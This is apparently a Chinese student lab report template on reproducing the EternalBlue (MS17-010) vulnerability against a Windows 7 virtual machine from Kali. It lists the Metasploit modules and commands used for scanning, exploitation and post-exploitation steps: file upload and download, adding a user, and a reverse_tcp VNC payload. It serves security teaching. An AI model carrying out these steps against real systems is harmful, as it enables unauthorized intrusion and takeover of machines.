一. 实验目的与配置
- 了解漏洞复现的基本流程和方法
- 熟悉永恒之蓝的漏洞原理及其利用
- 熟悉Metasploit框架的使用及其相关的命令
二. 实验环境
Win7虚拟机一台,kali虚拟机一台
三. 实验工具
VMWare、NMap、Metasploit
四. 实验步骤
搭建测试环境,将kali作为攻击主机、win7_x64 作为靶机
- 关闭win7防火墙,查看两台虚拟机的地址(注意在同一网段)
Kali虚拟机的地址为:
Win7 虚拟机的地址为:
- 测试两台虚拟机是否能互相ping通
- 打开kali机中的Metaploit
左上角第一个图标-> all apalications -> Metasploit
- 打开kali的一个Terminal,使用Nmap对靶机进行扫描
- 猜测主机的操作系统类型
- 上网查找上述系统可能出现的漏洞,发现在win7系统中出现永恒之蓝漏洞(MS17_010)。查找资料后发现永恒之蓝漏洞主要利用了445端口,通过上面的扫描可以发现445端口开启。
- 查询漏洞相关信息 (search ms17-010)
在Metasploit 中查询漏洞相关信息
- 对漏洞进行分析,判断端口445能否被入侵使用命令:use auxiliary/scanner/smb/smb_ms17_010 show options
设置被攻击的靶机IP,使用run命令进行测试 命令: set RHOSTS IP
出现回显,说明系统存在MS17_010漏洞,可以使用MS17_010进行入侵
使用攻击模块进行攻击命令: use exploit/windows/smb/ms17_010_eternalblue
使用show options 查看需要配置哪些选项
- 可以看到靶机的IP地址还没有配置,使用set命令进行配置,exploit命令进行攻击
- 攻击完成,出现meterpreter提示符。此时我们成功拿到win7靶机的权限。
- 使用screenshot 命令对靶机进行截图,并查看截图的文件,整理在实验报告中
- 向靶机上传一个文件
1、首先在kali上编写一个文件,保存在桌面上
2、使用upload命令进行上传操作
注意文件被放在C:\windows\system32中。
使用cat查看被上传的文件的内容。
- 使用download命令下载文件
使用ls查看靶机C:\windows\system32目录下的文件,随便下载一个文件,可打开文件进行查看
- 可以查看靶机对应的网关,路由信息,为后续的攻击做准备
- 输入sysinfo命令可以查看对应的系统信息
- 拿到shell,创建新用户信息。
使用net user 查看当前的用户信息,使用如图的命令添加新用户到用户组
- 远程连接win7
1、使用exit 退出shell,使用background命令回到msf界面
- 查看set payload参数,按两下TAB键进行回车
- 输入命令set payload windows/x64/vncinject/reverse_tcp
set viewonly no
exploit
- 成功获取控制权
五. 实验感想(总结、对实验的讨论、不足之处......)
【总结参考】
- 通过这次实验,让我掌握了熟悉Metasploit框架的使用及其相关的命令
【讨论参考】
MS17_010的原理是windows7的系统里面的一个漏洞,这次漏洞攻击我主要使用了metasploit。